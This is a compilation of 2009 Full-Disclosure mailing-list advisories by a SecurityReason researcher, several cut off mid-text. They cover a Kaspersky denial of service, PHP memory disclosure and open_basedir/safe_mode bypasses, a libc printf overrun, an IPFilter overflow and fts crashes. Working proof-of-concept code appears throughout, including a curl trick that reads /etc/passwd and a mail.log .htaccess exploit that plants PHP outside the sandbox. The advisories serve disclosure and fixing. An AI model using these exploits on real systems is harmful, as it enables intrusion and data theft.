50 edx0x2 2 ebx0x476ff4 4681716 esp0xbfffebc4 0xbfffebc4 ebp0xbfffebf4 0xbfffebf4 esi0x32 50 edi0x3e 62 we can try change edi register. For 'money_format("%.1073741824i",1);' (gdb) i r eax0x4000 1073741824 ecx0x32 50 edx0x2 2 ebx0x35bff4 3522548 esp0xbfffebbc 0xbfffebbc ebp0xbfffebec 0xbfffebec esi0x32 50 edi0x42 66 But let's see what will hapen for 'money_format("%.77715949976712904702i", 1.1);' crash in Program received signal SIGSEGV, Segmentation fault. 0x00e4327b in hack_digit.12295 () from /lib/libc.so.6 (gdb) i r eax0x3ffe 1073741822 ecx0x34 52 edx0x2 2 ebx0xf6eff4 16183284 esp0xbfffebb4 0xbfffebb4 ebp0xbfffebe4 0xbfffebe4 esi0x34 52 edi0x3e 62 esi 52. In
[Full-disclosure] Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 10.07.2009 - - Pub.: 19.08.2009 Risk: Medium Affected Software (tested): - - Kaspersky Internet Security 2010 9.0.0.459 (a) EN - - Kaspersky Anti-Virus 2010 9.0.0.463 DE Original URL: http://securityreason.com/achievement_securityalert/66 - --- 0.Description --- Kaspersky Lab is a computer security company, co-founded by Natalia Kasperskaya and Eugene Kaspersky in 1997, offering anti-virus, anti-spyware, anti-spam, and anti-intrusion products. Kaspersky Lab is a privately held company headquartered in Moscow, Russia with regional offices in Germany, France, the Netherlands, the UK, Poland, Romania, Sweden, Japan, China, Korea and the USA. - --- 1. Kaspersky AV/IS 2010 avp.exe Denial of Service --- The main problem exists in parsing url addresses. If we give a lot of dots, kaspersky avp.exe proccess, will get 100% of CPU and will block trafic via browsers. Relativistic time to return to normal behavior is very long. In practice, when we give a large number of dots, kaspesky will not return to normal behavior. This example will denial access to the browser and other kaspersky operations http://lu.cxib.net/.[ .xY where 1024http://lu.cxib.net/..[ more dots ]"> The user who executed the code above, will be deprived of the possibility of browsing and successive reset the kaspersky. Tested on: - - Kaspersky Internet Security 2010 9.0.0.459 (a) (EN) + Windows Vista Enterprise (EN) - - Kaspersky Anti-Virus 2010 9.0.0.463 (DE) + Windows XP Home Edition (DE) 0day (18.08.2009) exploit you can find: http://securityreason.com/downloads/kaspersky.2010.dos.html This script, will generate tags with different url lenght to block kaspersky services. However we can exploit this issue via html email. The method of attack is simple. The victim need only refer to a faulty address. - --- 2. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 - --- 3. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib {a.t] securityreason [d0t} com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://securityreason.pl/ - -- Best Regards, - pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg -BEGIN PGP SIGNATURE- iEYEARECAAYFAkqLQqIACgkQpiCeOKaYa9aLxgCgy3FzzR5xPzU6QgoK1VpHpjur paQAn3ku0sU5AzHjzjo3N0qq+Kywu7i1 =rQAP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SECURITYREASON: PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - - Dis.: 10.07.2009 - - - Pub.: 06.08.2009 Risk: High Affected Software: - - - PHP 5.3.0 - - - PHP 5.2.10 Original URL: http://securityreason.com/achievement_securityalert/65 - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.ini-restore.php ini_restore ? Restores the value of a configuration option ini_restore ( string $varname ) - - --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure --- The main problem exist in restoring php config environments. To demonstrate the problem, we need to declare variables via ini_set() function. When we try use ini_restore(), variables in class PG() will indicate any part of memory. - - ---zend_ini.c--- static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int stage TSRMLS_DC) /* {{{ */ { if (ini_entry->modified) { if (ini_entry->on_modify) { zend_try { /* even if on_modify bails out, we have to continue on with restoring, since there can be allocated variables that would be freed on MM shutdown and would lead to memory corruption later ini entry is modified again */ ini_entry->on_modify(ini_entry, ini_entry->orig_value, ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2, ini_entry->mh_arg3, stage TSRMLS_CC); } zend_end_try(); } if (ini_entry->value != ini_entry->orig_value) { efree(ini_entry->value); } ini_entry->value = ini_entry->orig_value; ini_entry->value_length = ini_entry->orig_value_length; ini_entry->modified = 0; ini_entry->orig_value = NULL; ini_entry->orig_value_length = 0; if (ini_entry->modifiable >= (1 << 3)) { ini_entry->modifiable >>= 3; } } return 0; } - - ---zend_ini.c--- Flag modified will be reset, and we can not considered modified variable. We don't check value of ini_entry->on_modify() and PG() will be now out of memory range. To demonstrate this issue - - ---example0 (5.2.10/5.3.0)--- 127# uname -a && php -v OpenBSD 127.cxib 4.6 GENERIC#0 i386 PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH 127# cat /var/www/www/sess.php 127# php /var/www/www/sess.php AAA PHP Warning: session_start(): open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5 PHP Warning: Unknown: open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No such file or directory (2) in Unknown on line 0 PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct ($|ma: no-cache) in Unknown on line 0 127# php /var/www/www/sess.php PHP Warning: session_start(): open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in /var/www/www/sess.php on line 5 PHP Warning: Unknown: open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed: No such file or directory (2) in Unknown on line 0 PHP Warning: Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (¤^j|ma: no-cache) in Unknown on line 0 - - ---example0 (5.2.10/5.3.0)--- The main problem is started in ini_restore("session.save_path"). To show this issue, we need use some function with PG() inside (like: session_start()). - - ---example1 (5.3.0)--- 127# uname -mrs && php -v NetBSD 5.0 i386 PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies 127# cat /www/file.php 127# php /www/file.php PHP Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7 Warning: include(): open_basedir restriction in effect. File(B) is not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7 PHP Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7 Warning: include(B): failed to open stream: Operation not permitted in /www/file.php on line 7 PHP Warning: include(): Failed opening 'B' for inclusion (include_path='.:/
[Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.0 (main.c) open_basedir bypass ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - - Dis.: 26.05.2009 - - - Pub.: 06.08.2009 Risk: Medium Affected Software: PHP 5.3.0 Original URL: http://securityreason.com/achievement_securityalert/64 - - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/mail.configuration.php mail.log NULL PHP_INI_SYSTEM|PHP_INI_PERDIR Available since PHP 5.3.0. - - --- 1. PHP 5.3.0 (main.c) open_basedir bypass --- The first issue exists in main/main.c - - --- STD_PHP_INI_ENTRY("mail.log",NULL, PHP_INI_SYSTEM|PHP_INI_PERDIR,OnUpdateString, mail_log,php_core_globals,core_globals) - - --- Access PHP_INI_PERDIR is accepted by .htaccess (Apache) or .user.ini (CGI). Function OnUpdateString dosen't check open_basedir. To reason, we need create new function OpUpdateMailLog, where open_basedir will be checked. Exploit: 127# cat /www/home/cx/show.php 127# curl http://localhost/home/cx/show.php /www/home/cx 127# cat /www/home/cx/set.php 127# curl http://localhost/home/cx/set.php Warning: ini_set(): open_basedir restriction in effect. File(/www/home/gpkc/tmp/) is not within the allowed path(s): (/www/home/cx) in /www/home/cx/set.php on line 2 We need create .htaccess or .user.ini for Apache SAPI: 127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess for CGI: 127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini and some file with mail() function inside. In header X-Mailer, we can put some php code to execute in other open_basedir range, like: 127# cat /www/home/cx/runmail.php http://securityreason.com'; $message = 'exploit'; $headers = 'From: s...@spam.c0m' . "\r\n" . 'Reply-To: s...@spam.c0m' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail($to, $subject, $message, $headers); ?> 127# curl http://localhost/home/cx/runmail.php 127# ls -la /www/home/gkpc/tmp/exploit.php - - -rw-r--r-- 1 www www 173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php Finish! Now we can exec evil script exploit.php via httpd. 127# curl http://localhost/home/gkpc/tmp/exploit.php mail() on [/www/home/cx/runmail.php:9]: To: s...@spam.c0m -- Headers: From: s...@spam.c0m Reply-To: s...@spam.c0m X-Mailer: PHP/www/home/gkpc/5.3.0 exploit.php is now in open_basedir=/www/home/gkpc/ range. - - --- 2. Fix --- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c - - --- 3. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 - - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib {a.t] securityreason [d00t>com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl - -BEGIN PGP SIGNATURE- iEYEARECAAYFAkp7FY4ACgkQpiCeOKaYa9YP7ACeKLHh47A/PJo7oPducKF/Iu0N SZMAn0dMdoqrEnwYZeB2KuzlCK7wc/rB =jSMc - -END PGP SIGNATURE- -BEGIN PGP SIGNATURE- iEYEARECAAYFAkp8K5kACgkQpiCeOKaYa9Yv0wCgulgKdIlAx8fErD+/f7Do/hbs qpQAn3VloWZCINo3wmqt4+uIo/m3fO7c =0K2+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf(3) Array Overrun
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple Vendors libc/gdtoa printf(3) Array Overrun ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 25.06.2009 CVE: CVE-2009-0689 Risk: High Affected Software (12.06.2009): - - OpenBSD 4.5 - - NetBSD 5.0 - - FreeBSD 7.2/6.4 Original URL: http://securityreason.com/achievement_securityalert/63 - --- 0.Description --- Week after the release of new version OpenBSD and NetBSD, our research team has checked a new implementation of gdtoa http://openbsd.org/45.html - --- A new version of the gdtoa code has been integrated, bringing better C99 support to printf(3) and friends. - --- More: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/ - --- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun --- The main problem exists in new dtoa implementation. asprintf(3) will crash for asprintf(ssij, "%0.262159f",x) where x != 0 the behavior is correct for 262158 Let's see: (gdb) r Starting program: /cxib/C/check Program received signal SIGSEGV, Segmentation fault. 0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12 (gdb) bt #0 0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12 #1 0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12 #2 0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12 #3 0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12 #4 0xbbb882e1 in asprintf () from /usr/lib/libc.so.12 #5 0x08048706 in main () at check.c:6 Let's see src/lib/libc/gdtoa/gdtoaimp.h - ---gdtoaimp.h--- ... #define Kmax 15 ... - ---gdtoaimp.h--- The maximum Kmax length is 15. If we give bigger value, like 17 (edi), program will overrun freelist array. bss will have 0x1. Correct reason (by NetBSD): - ---gdtoaimp.h--- ... #define Kmax (sizeof(size_t) << 3) ... - ---gdtoaimp.h--- What is wrong? This program will crash in - --- src/lib/libc/gdtoa/misc.c --- if ( (rv = freelist[k]) !=0) { freelist[k] = rv->next; } else { x = 1 << k; #ifdef Omit_Private_Memory rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong)); #else len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) - 1) /sizeof(double); if ((double *)(pmem_next - private_mem + len) <= (double *)PRIVATE_mem) { rv = (Bigint*)(void *)pmem_next; pmem_next += len; } else rv = (Bigint*)MALLOC(len*sizeof(double)); #endif if (rv == NULL) return NULL; rv->k = k; rv->maxwds = x; } - --- src/lib/libc/gdtoa/misc.c --- here rv->k = k; or freelist[k] = rv->next; A good example to show this issue is printf(1) program. 127# printf %1.262159f 1.1 Memory fault (core dumped) 127# printf %11.210999f 210911999111791199.510001001 esi = 0x12 edi = 0x1d 127# printf %11.200999f 220911999111791199.510001001 esi = 0x13 edi = 0x1d we can manipulate esi reg. 127# printf %11.200999f 1267686681.10001 Program received signal SIGSEGV, Segmentation fault. __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59 59 freelist[k] = rv->next; (gdb) i r eax0x20efdb04 552590084 ecx0x77ce2a9d 201029 edx0x0 0 ebx0x20eff654 552597076 esp0xcfbfc2b0 0xcfbfc2b0 ebp0xcfbfc2c8 0xcfbfc2c8 esi0x41414141 1094795585 edi0x1d 29 eip0xf59317 0xf59317 eflags 0x10206 66054 cs 0x2b 43 ss 0x33 51 ds 0x33 51 es 0x33 51 fs 0x33 51 gs 0x33 51 esi = 0x41414141 edi = 0x1d 1267686681 is value of esi reg. program will crash in freelist[k] = rv->next; Example 0: - --- chujwamwmuzg.pl --- #!/usr/local/bin/perl printf "%0.4194310f", 0x0.0x41414141; - --- chujwamwmuzg.pl --- Perl will crash with esi = 0x41414141 edi = 0x15 Example 1: 127# php -r 'money_format("%0.262159n", 1.);' Memory fault (core dumped) Programs that allow you to enter/control format string, are vulnerable. We believe that the OpenBSD source-tree have only printf(1) and perl(1) affected. Functions like printf(3), strfmon(3), fprintf(3), sprintf(3), snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3), vsnprintf(3), vasprintf(3) and others, are vulnerable (with new gdtoa impl.) Other languages are also affected ( printf in perl ) - --- 2. Fix --- NetBSD fix: http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gd
[Full-disclosure] IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ] Author: Maksymilian Arciemowicz http://SecurityReason.com/ Date: - - Dis.: 05.03.2009 - - Pub.: 22.05.2009 CVE: CVE-2009-1476 Risk: Low Original URL: http://securityreason.com/achievement_securityalert/62 - --- 0.Description --- IPFilter is a software package that can be used to provide network address translation (NAT) or firewall services. To use, it can either be used as a loadable kernel module or incorporated into your UNIX kernel; use as a loadable kernel module where possible is highly recommended. Scripts are provided to install and patch system files, as required. ippool - user interface to the IPFilter pools Ippool is used to manage information stored in the IP pools subsystem of IPFilter. Configuration file information may be parsed and loaded into the kernel, currently configured pools removed or changed as well as inspected. - --- 1. IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow --- The main problem exist in lib/load_http.c . Let's see lib/load_http.c ( char buffer[1024] ) - --- ... alist_t * load_http(char *url) { int fd, len, left, port, endhdr, removed; char *s, *t, *u, buffer[1024], *myurl; alist_t *a, *rtop, *rbot; struct sockaddr_in sin; struct hostent *host; /* * More than this would just be absurd. */ if (strlen(url) > 512) { fprintf(stderr, "load_http has a URL > 512 bytes?!\n"); return NULL; } fd = -1; rtop = NULL; rbot = NULL; sprintf(buffer, "GET %s HTTP/1.0\r\n", url); myurl = strdup(url); if (myurl == NULL) goto done; s = myurl + 7;/* http:// */ t = strchr(s, '/'); if (t == NULL) { fprintf(stderr, "load_http has a malformed URL '%s'\n", url); free(myurl); return NULL; } *t++ = '\0'; u = strchr(s, '@'); if (u != NULL) s = u + 1;/* AUTH */ sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s); ... - --- 0. buffer[] have only 1024 bytes, 1. url can't have more than 512 bytes, 2. url will be copied into buffer here: sprintf(buffer, "GET %s HTTP/1.0\r\n", url); and here (s is a host) sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s); so if the url have 512 = strlen(http:// A x504 /) then into buffer will be put strlen(GET HTTP/1.0\r\n) = 15 strlen(url) = 512 strlen(Host: \r\n\r\n)= 10 strlen(A x504) = 504 sum = 1041 bytes. Any use of this function is a potential risk. Programs such as "ippool" may be at risk. - --- 2. Fix --- NetBSD fix: http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?only_with_tag=MAIN - --- 3. Greets --- Christos Zoulas sp3x infospec chujwamwdupe pi3 and others - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib [a.t] securityreason [d00t] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (OpenBSD) iEUEARECAAYFAkoWwlMACgkQpiCeOKaYa9Z40wCg3EMaEvfUd6w+CC16Xg9LOes8 RWAAmJecg/1hNPWd6z8oAtCHKi1z/B8= =Ku9/ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.9 curl safe_mode & open_basedir bypass
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.2.9 curl safe_mode & open_basedir bypass ] Author: Maksymilian Arciemowicz http://SecurityReason.com Date: - - Dis.: 31.12.2008 - - Pub.: 10.04.2009 Original URL: http://securityreason.com/achievement_securityalert/61 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. - --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass --- The main problem exist in checking safe_mode & open_basedir for curl functions. There is a difference between checking the access and the implementation of the operations. Example code: curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd"); curl in the first place check safe_mode and open_basedir for "file:etc/passwd" /* realpath is ./file:/etc/passwd */ and in next step will read "file:etc/passwd" (without wrapper => /etc/passwd) To attack, we need to cheat php by creating a virtual tree like ./file:/ ./file:/etc/ ./file:/etc/passwd/ Example for /etc/hosts : ./file:/ ./file:/etc/ ./file:/etc/hosts/ So if you execute the file as user X, we have to create special subdirectories. - ---EXAMPLE-EXPLOIT--- mkDIR("file:"); chdir("file:"); mkDIR("etc"); chdir("etc"); mkDIR("passwd"); chdir(".."); chdir(".."); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); - ---EXAMPLE-EXPLOIT--- The previous changes, may contribute to this error in php 5.2.9. We will discourages the use ( safe_mode & open_basedir ) as the main security. Exploit: http://securityreason.com/achievement_exploitalert/11 - --- 2. Fix --- Not use safe_mode and open_basedir like a main safety - --- 3. Greets --- sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms - --- 4. Contact --- Author: SecurityReason.com [ Maksymilian Arciemowicz ] Email: cxib [a.t] securityreason [d00t] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (OpenBSD) iEYEARECAAYFAknfVzEACgkQpiCeOKaYa9bB7wCfUGnETLIyNN1de0A/wwLumeAy wHMAn3OiRiuKq9ZL4zM0YNH6ix+NSNtQ =Hcjr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] libc:fts_*():multiple vendors, Denial-of-service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [libc:fts_*():multiple vendors, Denial-of-service ] Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this problem. Affected Software (official): - - OpenBSD 4.4 /usr/src/lib/libc/gen/fts.c - - Microsoft Interix 6.0 10.0.6030.0 x86 - - Microsft Vista Enterprise SearchIndexer.exe probably more... Original URL: http://securityreason.com/achievement_securityalert/60 - --- 0.Description --- The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy. typedef struct _ftsent { unsigned short fts_info;/* flags for FTSENT structure */ char *fts_accpath; /* access path */ char *fts_path; /* root path */ size_t fts_pathlen; /* strlen(fts_path) */ char *fts_name; /* file name */ size_t fts_namelen; /* strlen(fts_name) */ short fts_level;/* depth (-1 to N) */ int fts_errno; /* file errno */ long fts_number;/* local numeric value */ void *fts_pointer; /* local address value */ struct _ftsent *fts_parent; /* parent directory */ struct _ftsent *fts_link; /* next file structure */ struct _ftsent *fts_cycle; /* cycle structure */ struct stat *fts_statp; /* stat(2) information */ } FTSENT; - --- 1. libc:fts_*():multiple vendors, Denial-of-service --- The main problem exist in fts_level from ftsent structure. Type of fts_level is short. let's see /usr/src/lib/libc/gen/fts.c (OpenBSD) - ---line-616-625--- /* * Figure out the max file name length that can be stored in the * current path -- the inner loop allocates more path as necessary. * We really wouldn't have to do the maxlen calculations here, we * could do them in fts_read before returning the path, but it's a * lot easier here since the length is part of the dirent structure. * * If not changing directories set a pointer so that can just append * each new name into the path. */ - ---line-616-625--- "We really wouldn't have to do the maxlen calculations here..." Here should be some level or pathlen monitor. Should. short fts_level;/* depth (-1 to N) */ fts_level is short type, no aleph zero - ---line-247-249--- #define NAPPEND(p) \ (p->fts_path[p->fts_pathlen - 1] == '/' \ ? p->fts_pathlen - 1 : p->fts_pathlen) - ---line-247-249--- this function will crash, when we will requests to wrong allocated memory. So, what is wrong: 127# pwd /home/cxib 127# du /home/ 4 /home/cxib/.ssh Segmentation fault (core dumped) 127# rm -rf Samotnosc Segmentation fault (core dumped) 127# chmod -R 000 Samotnosc Segmentation fault (core dumped) 127# gdb -q du (no debugging symbols found) (gdb) r /home/ Starting program: /usr/bin/du /home/ 4 /home/cxib/.ssh Program received signal SIGSEGV, Segmentation fault. 0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385 385 name: t = sp->fts_path + NAPPEND(p->fts_parent); (gdb) print p->fts_level $1 = -19001 (gdb) print p->fts_path $2 = 0x837c9000 and we have answer. 127# cd /home/cxib 127# mkdir len 127# cd len 127# mkdir 24 127# mkdir 23 127# mkdir 22 127# cd 22 127# perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }' 127# du . Segmentation fault (core dumped) 127# cd ../23/ 127# perl -e '$a="C"x23;for(1..5){ ! -d $a and mkdir $a and chdir $a }' 127# du . Segmentation fault (core dumped) 127# cd ../24/ 127# perl -e '$a="C"x24;for(1..5){ ! -d $a and mkdir $a and chdir $a }' 127# du . /* Will print correctly output */ In all cases, the function should return an error flag "ENAMETOOLONG". The security consequences can be derived from the crash of the program. All combinations like " while ( fts_read ( ) ) " and " ftw ( ) " function, constitute a potential risk. Examples of vulnerable programs: du rm chmod -R chgrp -R In the case of Microsoft Interix, the situati
[Full-disclosure] SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ] Author: Maksymilian Arciemowicz securityreason.com Date: - - Written: 20.11.2008 - - Public: 05.12.2008 SecurityReason Research SecurityAlert Id: 59 SecurityRisk: High Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/59 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://pl.php.net/manual/pl/refs.utilspec.server.php - --- 1.PHP 5.2.6 SAPI php_getuid() overload --- Using PHP 5.2.6, as a Apache module can bypass many security points. To understand this issue, first we need know, where is the problem. 127# cd /www/trafka 127# ls -la total 12 drwxr-xr-x 2 www www 512 Sep 10 03:49 . drwxr-xr-x 4 www www 512 Sep 10 03:41 .. - -rw-r--r-- 1 www www 26 Sep 10 03:49 .htaccess - -rw-r--r-- 1 www www 33 Sep 10 03:49 not.php - -rw-r--r-- 1 www www 107 Sep 10 03:49 pufff.php - -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php 127# cat .htaccess php_value error_log /etc/ 127# cat not.php 127# cat pufff.php 127# cat sleep.php 127# apachectl restart /usr/local/sbin/apachectl restart: httpd restarted 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/not.php only echo 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# Now error_log is empty Example exploit: 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/sleep.php ^C 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ any new "apache child" process, allow overload environment like error_log. 127# apachectl restart /usr/local/sbin/apachectl restart: httpd restarted 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6365 0.0 0.5 18676 14248 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log=/etc/ 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# curl http://localhost/trafka/pufff.php safe_mode=1 error_log= 127# ps -aux -U www USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 6361 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6362 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6363 0.0 0.5 18676 14288 ?? S 4:01AM 0:00.00 /usr/local/sbin/httpd www 6364 0.0 0.5 18676 14288 